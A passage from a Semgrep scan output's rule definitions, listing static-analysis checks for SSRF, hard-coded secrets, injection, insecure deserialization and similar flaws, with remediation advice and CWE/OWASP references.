[https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-pycurl.tainted-flask-http-request-pycurl","id":"python.flask.net.tainted-flask-http-request-pycurl.tainted-flask-http-request-pycurl","name":"python.flask.net.tainted-flask-http-request-pycurl.tainted-flask-http-request-pycurl","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.net.tainted-flask-http-request-pycurl.tainted-flask-http-request-pycurl"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-aiohttp.tainted-flask-http-request-aiohttp)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-aiohttp.tainted-flask-http-request-aiohttp","id":"python.flask.net.tainted-flask-http-request-aiohttp.tainted-flask-http-request-aiohttp","name":"python.flask.net.tainted-flask-http-request-aiohttp.tainted-flask-http-request-aiohttp","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.net.tainted-flask-http-request-aiohttp.tainted-flask-http-request-aiohttp"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected an unsecured transmission channel. 'OpenerDirector.open(...)' is being used with 'ftp://'. Information sent over this connection will be unencrypted. Consider using SFTP instead. urllib does not support SFTP, so consider a library which supports SFTP."},"help":{"markdown":"Detected an unsecured transmission channel. 'OpenerDirector.open(...)' is being used with 'ftp://'. Information sent over this connection will be unencrypted. Consider using SFTP instead. urllib does not support SFTP, so consider a library which supports SFTP.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.insecure-transport.urllib.insecure-openerdirector-open-ftp.insecure-openerdirector-open-ftp)\n - [https://docs.python.org/3/library/urllib.request.html#urllib.request.OpenerDirector.open](https://docs.python.org/3/library/urllib.request.html#urllib.request.OpenerDirector.open)\n","text":"Detected an unsecured transmission channel. 'OpenerDirector.open(...)' is being used with 'ftp://'. Information sent over this connection will be unencrypted. Consider using SFTP instead. urllib does not support SFTP, so consider a library which supports SFTP."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.insecure-transport.urllib.insecure-openerdirector-open-ftp.insecure-openerdirector-open-ftp","id":"python.lang.security.audit.insecure-transport.urllib.insecure-openerdirector-open-ftp.insecure-openerdirector-open-ftp","name":"python.lang.security.audit.insecure-transport.urllib.insecure-openerdirector-open-ftp.insecure-openerdirector-open-ftp","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.insecure-transport.urllib.insecure-openerdirector-open-ftp.insecure-openerdirector-open-ftp"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.mysql.node-mysql-hardcoded-secret.node-mysql-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.mysql.node-mysql-hardcoded-secret.node-mysql-hardcoded-secret","id":"javascript.mysql.node-mysql-hardcoded-secret.node-mysql-hardcoded-secret","name":"javascript.mysql.node-mysql-hardcoded-secret.node-mysql-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.mysql.node-mysql-hardcoded-secret.node-mysql-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A hard-coded cryptographic key was detected. An attacker that obtains this key via reverse engineering or access to source code will be able to re-use this key to encrypt, decrypt, and/or sign data at will. Cryptographic keys should be unique, and randomly generated per user, per client."},"help":{"markdown":"A hard-coded cryptographic key was detected. An attacker that obtains this key via reverse engineering or access to source code will be able to re-use this key to encrypt, decrypt, and/or sign data at will. Cryptographic keys should be unique, and randomly generated per user, per client.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.hardcoded-symmetric-key.hardcoded-symmetric-key)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n","text":"A hard-coded cryptographic key was detected. An attacker that obtains this key via reverse engineering or access to source code will be able to re-use this key to encrypt, decrypt, and/or sign data at will. Cryptographic keys should be unique, and randomly generated per user, per client."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.hardcoded-symmetric-key.hardcoded-symmetric-key","id":"swift.commoncrypto.hardcoded-symmetric-key.hardcoded-symmetric-key","name":"swift.commoncrypto.hardcoded-symmetric-key.hardcoded-symmetric-key","properties":{"precision":"very-high","tags":["CWE-321: Use of Hard-coded Cryptographic Key","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.hardcoded-symmetric-key.hardcoded-symmetric-key"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"HttpOnly cookie flag is explicitly disabled. This will cause cookies to be transmitted over unencrypted HTTP connections which can allow theft of confidential user data such as session tokens."},"help":{"markdown":"HttpOnly cookie flag is explicitly disabled. This will cause cookies to be transmitted over unencrypted HTTP connections which can allow theft of confidential user data such as session tokens.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.taint-cookie-http-false.taint-cookie-http-false)\n - [https://www.php.net/manual/en/function.setcookie.php](https://www.php.net/manual/en/function.setcookie.php)\n - [https://www.php.net/manual/en/function.session-set-cookie-params.php](https://www.php.net/manual/en/function.session-set-cookie-params.php)\n - [https://www.php.net/manual/en/configuration.file.php](https://www.php.net/manual/en/configuration.file.php)\n","text":"HttpOnly cookie flag is explicitly disabled. This will cause cookies to be transmitted over unencrypted HTTP connections which can allow theft of confidential user data such as session tokens."},"helpUri":"https://semgrep.dev/r/php.lang.security.taint-cookie-http-false.taint-cookie-http-false","id":"php.lang.security.taint-cookie-http-false.taint-cookie-http-false","name":"php.lang.security.taint-cookie-http-false.taint-cookie-http-false","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.taint-cookie-http-false.taint-cookie-http-false"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Stripe API Key detected"},"help":{"markdown":"Stripe API Key detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-stripe-api-key.detected-stripe-api-key)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Stripe API Key detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-stripe-api-key.detected-stripe-api-key","id":"generic.secrets.security.detected-stripe-api-key.detected-stripe-api-key","name":"generic.secrets.security.detected-stripe-api-key.detected-stripe-api-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-stripe-api-key.detected-stripe-api-key"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.net.tainted-fastapi-http-request-paramiko.tainted-fastapi-http-request-paramiko)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.fastapi.net.tainted-fastapi-http-request-paramiko.tainted-fastapi-http-request-paramiko","id":"python.fastapi.net.tainted-fastapi-http-request-paramiko.tainted-fastapi-http-request-paramiko","name":"python.fastapi.net.tainted-fastapi-http-request-paramiko.tainted-fastapi-http-request-paramiko","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.net.tainted-fastapi-http-request-paramiko.tainted-fastapi-http-request-paramiko"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a method annotated with 'RequestMapping' that does not specify the HTTP method. CSRF protections are not enabled for GET, HEAD, TRACE, or OPTIONS, and by default all HTTP methods are allowed when the HTTP method is not explicitly specified. This means that a method that performs state changes could be vulnerable to CSRF attacks. To mitigate, add the 'method' field and specify the HTTP method (such as 'RequestMethod.POST')."},"help":{"markdown":"Detected a method annotated with 'RequestMapping' that does not specify the HTTP method. CSRF protections are not enabled for GET, HEAD, TRACE, or OPTIONS, and by default all HTTP methods are allowed when the HTTP method is not explicitly specified. This means that a method that performs state changes could be vulnerable to CSRF attacks. To mitigate, add the 'method' field and specify the HTTP method (such as 'RequestMethod.POST').\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.unrestricted-request-mapping.unrestricted-request-mapping)\n - [https://find-sec-bugs.github.io/bugs.htm#SPRING_CSRF_UNRESTRICTED_REQUEST_MAPPING](https://find-sec-bugs.github.io/bugs.htm#SPRING_CSRF_UNRESTRICTED_REQUEST_MAPPING)\n","text":"Detected a method annotated with 'RequestMapping' that does not specify the HTTP method. CSRF protections are not enabled for GET, HEAD, TRACE, or OPTIONS, and by default all HTTP methods are allowed when the HTTP method is not explicitly specified. This means that a method that performs state changes could be vulnerable to CSRF attacks. To mitigate, add the 'method' field and specify the HTTP method (such as 'RequestMethod.POST')."},"helpUri":"https://semgrep.dev/r/java.spring.security.unrestricted-request-mapping.unrestricted-request-mapping","id":"java.spring.security.unrestricted-request-mapping.unrestricted-request-mapping","name":"java.spring.security.unrestricted-request-mapping.unrestricted-request-mapping","properties":{"precision":"very-high","tags":["CWE-352: Cross-Site Request Forgery (CSRF)","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.unrestricted-request-mapping.unrestricted-request-mapping"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Pod is sharing the host process ID namespace. When paired with ptrace this can be used to escalate privileges outside of the container. Remove the 'hostPID' key to disable this functionality."},"help":{"markdown":"Pod is sharing the host process ID namespace. When paired with ptrace this can be used to escalate privileges outside of the container. Remove the 'hostPID' key to disable this functionality.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.kubernetes.security.hostpid-pod.hostpid-pod)\n - [https://kubernetes.io/docs/concepts/policy/pod-security-policy/#host-namespaces](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#host-namespaces)\n","text":"Pod is sharing the host process ID namespace. When paired with ptrace this can be used to escalate privileges outside of the container. Remove the 'hostPID' key to disable this functionality."},"helpUri":"https://semgrep.dev/r/yaml.kubernetes.security.hostpid-pod.hostpid-pod","id":"yaml.kubernetes.security.hostpid-pod.hostpid-pod","name":"yaml.kubernetes.security.hostpid-pod.hostpid-pod","properties":{"precision":"very-high","tags":["CWE-269: Improper Privilege Management","LOW CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.kubernetes.security.hostpid-pod.hostpid-pod"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Make sure that unverified user data can not reach `vm2`."},"help":{"markdown":"Make sure that unverified user data can not reach `vm2`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.express-vm2-injection.express-vm2-injection)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Injection_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Injection_Prevention_Cheat_Sheet.html)\n","text":"Make sure that unverified user data can not reach `vm2`."},"helpUri":"https://semgrep.dev/r/javascript.express.security.express-vm2-injection.express-vm2-injection","id":"javascript.express.security.express-vm2-injection.express-vm2-injection","name":"javascript.express.security.express-vm2-injection.express-vm2-injection","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.express-vm2-injection.express-vm2-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.psycopg2.python-psycopg2-hardcoded-secret.python-psycopg2-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.psycopg2.python-psycopg2-hardcoded-secret.python-psycopg2-hardcoded-secret","id":"python.psycopg2.python-psycopg2-hardcoded-secret.python-psycopg2-hardcoded-secret","name":"python.psycopg2.python-psycopg2-hardcoded-secret.python-psycopg2-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.psycopg2.python-psycopg2-hardcoded-secret.python-psycopg2-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. A number of functions and packages in the `torch` module rely on the `pickle` module and should not be used to unpackage data from untrusted sources."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. A number of functions and packages in the `torch` module rely on the `pickle` module and should not be used to unpackage data from untrusted sources.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-torch-pickle-aws-lambda.tainted-torch-pickle-aws-lambda)\n - [https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting-machine-learning-pickle-files/](https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting-machine-learning-pickle-files/)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/;](https://davidhamann.de/2020/04/05/exploiting-python-pickle/;)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://pytorch.org/docs/stable/_modules/torch/distributed/distributed_c10d.html#broadcast_object_list:~:text=.BytesIO()-,_pickler,-(f)](https://pytorch.org/docs/stable/_modules/torch/distributed/distributed_c10d.html#broadcast_object_list:~:text=.BytesIO()-,_pickler,-(f))\n - [https://pytorch.org/docs/stable/generated/torch.load.html](https://pytorch.org/docs/stable/generated/torch.load.html)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. A number of functions and packages in the `torch` module rely on the `pickle` module and should not be used to unpackage data from untrusted sources."},"helpUri":"https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-torch-pickle-aws-lambda.tainted-torch-pickle-aws-lambda","id":"python.aws-lambda.deserialization.tainted-torch-pickle-aws-lambda.tainted-torch-pickle-aws-lambda","name":"python.aws-lambda.deserialization.tainted-torch-pickle-aws-lambda.tainted-torch-pickle-aws-lambda","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.deserialization.tainted-torch-pickle-aws-lambda.tainted-torch-pickle-aws-lambda"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Hardcoded variable `SECRET_KEY` detected. Use environment variables or config files instead"},"help":{"markdown":"Hardcoded variable `SECRET_KEY` detected. Use environment variables or config files instead\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_SECRET_KEY)\n - [https://bento.dev/checks/flask/avoid-hardcoded-config/](https://bento.dev/checks/flask/avoid-hardcoded-config/)\n - [https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#builtin-configuration-values](https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#builtin-configuration-values)\n - [https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#environment-and-debug-features](https://flask.palletsprojects.com/en/1.1.x/config/?highlight=configuration#environment-and-debug-features)\n","text":"Hardcoded variable `SECRET_KEY` detected. Use environment variables or config files instead"},"helpUri":"https://semgrep.dev/r/python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_SECRET_KEY","id":"python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_SECRET_KEY","name":"python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_SECRET_KEY","properties":{"precision":"very-high","tags":["CWE-489: Active Debug Code","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.security.audit.hardcoded-config.avoid_hardcoded_config_SECRET_KEY"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected string concatenation with a non-literal variable in a pg Ruby SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized queries like so: `conn.exec_params('SELECT $1 AS a, $2 AS b, $3 AS c', [1, 2, nil])` And you can use prepared statements with `exec_prepared`."},"help":{"markdown":"Detected string concatenation with a non-literal variable in a pg Ruby SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized queries like so: `conn.exec_params('SELECT $1 AS a, $2 AS b, $3 AS c', [1, 2, nil])` And you can use prepared statements with `exec_prepared`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.sqli.ruby-pg-sqli.ruby-pg-sqli)\n - [https://www.rubydoc.info/gems/pg/PG/Connection](https://www.rubydoc.info/gems/pg/PG/Connection)\n","text":"Detected string concatenation with a non-literal variable in a pg Ruby SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized queries like so: `conn.exec_params('SELECT $1 AS a, $2 AS b, $3 AS c', [1, 2, nil])` And you can use prepared statements with `exec_prepared`."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.sqli.ruby-pg-sqli.ruby-pg-sqli","id":"ruby.rails.security.audit.sqli.ruby-pg-sqli.ruby-pg-sqli","name":"ruby.rails.security.audit.sqli.ruby-pg-sqli.ruby-pg-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.sqli.ruby-pg-sqli.ruby-pg-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.spring.spring-data-mongo-nosqli.spring-data-mongo-nosqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"helpUri":"https://semgrep.dev/r/kotlin.spring.spring-data-mongo-nosqli.spring-data-mongo-nosqli","id":"kotlin.spring.spring-data-mongo-nosqli.spring-data-mongo-nosqli","name":"kotlin.spring.spring-data-mongo-nosqli.spring-data-mongo-nosqli","properties":{"precision":"very-high","tags":["CWE-943: Improper Neutralization of Special Elements in Data Query Logic","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.spring.spring-data-mongo-nosqli.spring-data-mongo-nosqli"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"DefaultHttpClient is deprecated. Further, it does not support connections using TLS1.2, which makes using DefaultHttpClient a security hazard. Use SystemDefaultHttpClient instead, which supports TLS1.2."},"help":{"markdown":"DefaultHttpClient is deprecated. Further, it does not support connections using TLS1.2, which makes using DefaultHttpClient a security hazard. Use SystemDefaultHttpClient instead, which supports TLS1.2.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.lang.security.defaulthttpclient-is-deprecated.defaulthttpclient-is-deprecated)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"DefaultHttpClient is deprecated. Further, it does not support connections using TLS1.2, which makes using DefaultHttpClient a security hazard. Use SystemDefaultHttpClient instead, which supports TLS1.2."},"helpUri":"https://semgrep.dev/r/kotlin.lang.security.defaulthttpclient-is-deprecated.defaulthttpclient-is-deprecated","id":"kotlin.lang.security.defaulthttpclient-is-deprecated.defaulthttpclient-is-deprecated","name":"kotlin.lang.security.defaulthttpclient-is-deprecated.defaulthttpclient-is-deprecated","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.lang.security.defaulthttpclient-is-deprecated.defaulthttpclient-is-deprecated"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'."},"help":{"markdown":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.sqli.jpa-sqli.jpa-sqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.sqli.jpa-sqli.jpa-sqli","id":"java.lang.security.audit.sqli.jpa-sqli.jpa-sqli","name":"java.lang.security.audit.sqli.jpa-sqli.jpa-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: 